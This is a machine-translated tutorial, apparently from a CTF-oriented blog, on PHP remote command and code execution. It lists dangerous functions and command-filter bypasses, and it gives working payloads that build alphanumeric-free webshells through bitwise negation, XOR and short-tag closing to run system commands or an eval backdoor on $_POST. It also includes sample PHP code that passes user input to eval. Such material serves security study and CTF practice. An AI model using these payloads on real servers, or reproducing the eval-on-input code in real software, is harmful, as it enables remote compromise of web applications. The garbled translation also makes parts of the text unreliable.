One 、RCE The definition of

RCE English full name ：remote command/code execute
Divided into remote command execution ping And remote code execution evel.
The reason for the vulnerability ： There is no input processing at the input port .
Our common router 、 A firewall 、 Intrusion detection and other devices web On the management interface
Generally, users will be provided with a ping Operation of the web Interface , User from web Input target on the interface IP, After submission , The backstage will be right for IP Address once ping test , And return the test results . In fact, this is an interface , It allows attackers to inject operating system commands or code directly into the background server , To control the background system , This is it. RCE Loophole .

Two 、 It can be used simply to achieve rce Purpose those functions

1.eval()

2.assert() Assertion function

PHP 5

assert(mixed $assertion, string $description = ?): bool

PHP 7

assert(mixed $assertion, Throwable $exception = ?): bool

assert() Will check the designated assertion And the result is false Take appropriate action when

in addition , If assertion Is string , It will be assert() treat as PHP Code to execute  

3.system()

Functions that execute certain instructions , such as ：ls、cat、whoami、ifconfig Such as instruction

4.passthru()

And system The usage is basically the same , stay system After the function is filtered, consider using

5.exec()

because exec No echo , So it can be saved in the file , Or with the help of print_r For the output  

Using posture ：echo exec("ls",$file); 

exec(print_r(system(ls))); //system and print_r Can be replaced by functions with similar functions

6.shell_exec

shell_exec And `` The same effect , But no echo , need echo Or other output functions to make it echo

3、 ... and 、 Command execution to bypass

1. Filter cat,flag Other keywords

RCE Bypass filter keywords

more: Page by page display file content
less: And more similar
head: Look at the first few lines
tac: Start with the last line to show , It can be seen that tac yes cat Reverse display of
tail: Look at the last few lines
nl： On display , Output line number by the way
od: Read file contents in binary mode
vi: An editor , You can see
vim: An editor , You can see
sort: You can see
uniq: You can see
file -f: Report the details of the error
sh /flag 2>%261  // Report the contents of the file in error

2. Space around

%09（url Pass on ）(tab)

%20(space)

${IFS}

$IFS$9

<>（cat<>/flag）

<（cat</flag）

$IFS

{cat,flag}// Curly braces

3. Filter separator | & ;

RCE summary _C1yas0 The blog of -CSDN Blog Very detailed

The key is to talk about the way of bypassing without echo

1. The first is XOR

aa='phpinfo()'  # Change to the desired string

for i in aa:

print(  hex( int(hex(ord(i)),16) ^ 0xff),end=' ')

No alphanumeric bypass regular expression summary （ Including uploading temporary files 、 Exclusive or 、 or 、 Take the opposite 、 Autoincrement script ）_yu22x The blog of -CSDN Blog _ Bypass regular expressions

Example ：  //print_r=(%8f%8d%96%91%8b%a0%8d)^(%ff%ff%ff%ff%ff%ff%ff) 

2. Reverse to bypass

<?php

echo urlencode(~'phpinfo');

payload: ?code=(~%8F%97%8F%96%91%99%90)();

For example, this question

<?php
error_reporting(0);
if(isset($_GET['code'])){
            $code=$_GET['code'];
                    if(strlen($code)>40){
                                        die("This is too Long.");
                                                }
                    if(preg_match("/[A-Za-z0-9]+/",$code)){
                                        die("NO.");
                                                }
                    @eval($code);
}
else{
            highlight_file(__FILE__);
}

// ?>

  Filter out all numbers and letters ,

ad locum , We can't use... Directly eval because eval Not at all php function So we can't call through the method of variable function .
ad locum , We use assert To construct the , But because of php Version of the problem , We can't directly construct <?php assert($_POST['a']);>, We need to call eval
Spliced as assert（eval($_POST[test])）
 

<?php 
error_reporting(0);
$a='assert';
$b=urlencode(~$a);
echo $b;
echo "<br>";
$c='(eval($_POST[x]))';
$d=urlencode(~$c);
echo $d;
 ?>?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%87%A2%D6%D6);

Then link Jianyi to operate

webshell No echo  

<?php
$cmd=$_GET['cmd'];
if(preg_match("/[A-Za-z0-9]/",$cmd)){

    die("giaogiaogiao!!!");
}
else {
    eval($cmd);
}
highlight_file(__FILE__)
?>

Also filter out alphanumeric , But using the method of the above question will report an error , Explain that there is also filtering in the background

  For no characters Webshell,PHP5 And PHP7 There will be differences in .

（1） stay PHP 5 in ,assert() It's a function , We can use =assert;_() This form is used to realize the dynamic execution of code . But in PHP 7 in ,assert() It became a and eval() The same language structure , Call method above is no longer supported .（ But it seems to be PHP 7.0.12 You can also call ）

（2）PHP5 in , It is not supported ($a)() This method calls the method , But in PHP 7 The call method is supported in , So I support writing this way ('phpinfo')();

Enter the page , Found filtered letters and numbers , Input no characters Webshell The type of , For parameterless Webshell There are many ways to construct , There is negation , Exclusive or , Self increasing , Closed backquote construction, etc , By converting non alphanumeric characters , Finally, we can construct a-z0-9 Any character in . And then reuse it PHP Features that allow dynamic function execution , A function name at the splice , So as to carry out dynamic execution .

1. Code inversion bypasses

Through to ~'_GET' Conduct urlencode() Reverse the code , By way of anti + back = Construct in positive form .

In the figure %A0%B8%BA%AB by GET Negation of ,%93%8C by ls Take the opposite url code , In the figure payload As the result of the , perform system(ls) The order of .

?cmd=${~%A0%B8%BA%AB}{%ff}(~%93%8C);&%ff=system

<?php
echo urlencode(~'cat flag.txt');

%9C%9E%8B%DF%99%93%9E%98%D1%8B%87%8B

Finally, it will also ls Change for cat flag.txt Of url Reverse encoding , Grab flag.txt The content of

Method 2 ：

Use the closing method

Use ?> Close the original <?, Then use the new <? Content ?> Rewrite and use backquotes ` coordination url Execute the command in the form of code inversion

because php It's all about <? At the beginning, so we close in advance ,php Short label ,<?=?> amount to <? echo?>,

?><?=`{${~%A0%B8%BA%AB}{%ff}}`;&%ff=ls

`` Backquotes are command execution ,shell_exec Abbreviation

notice flag.txt

?><?=`{${~%A0%B8%BA%AB}{%ff}}`;&%ff=cat flag.txt  Current directory

Method 3 ：

Use XOR to construct

<?php
    var_dump("`{ { {"^"?<>/"); //_GET
?>

    $_="`{ { {"^"?<>/";${$_}[_](${$_}[__]);     //$_GET[_]($_GET[__])

?cmd=$_="`{ { {"^"?<>/";${$_}[_](${$_}[__]);&_=system&__=ls

And get flag I won't talk about it

php Short label

Our most common PHP The label is <?php ?> 了 , however PHP There are also two short tags in , namely <? ?> and <?= ?>. When keyword “php” After being filtered , At this time, we cannot use <?php ?> 了 , But we can bypass it with two other short tags , And the code in the short tag does not need to use semicolons ;.

among ,<? ?> It's equivalent to <?php ?> Replacement . and <?= ?> Is equivalent to <?php echo ... ?>. for example ：

<?='Hello World'?>    //  Output  "Hello World"

  Recommended documents ： The old saying that there are no alphanumeric Webshell summary - Tencent cloud developer community - Tencent cloud Very clear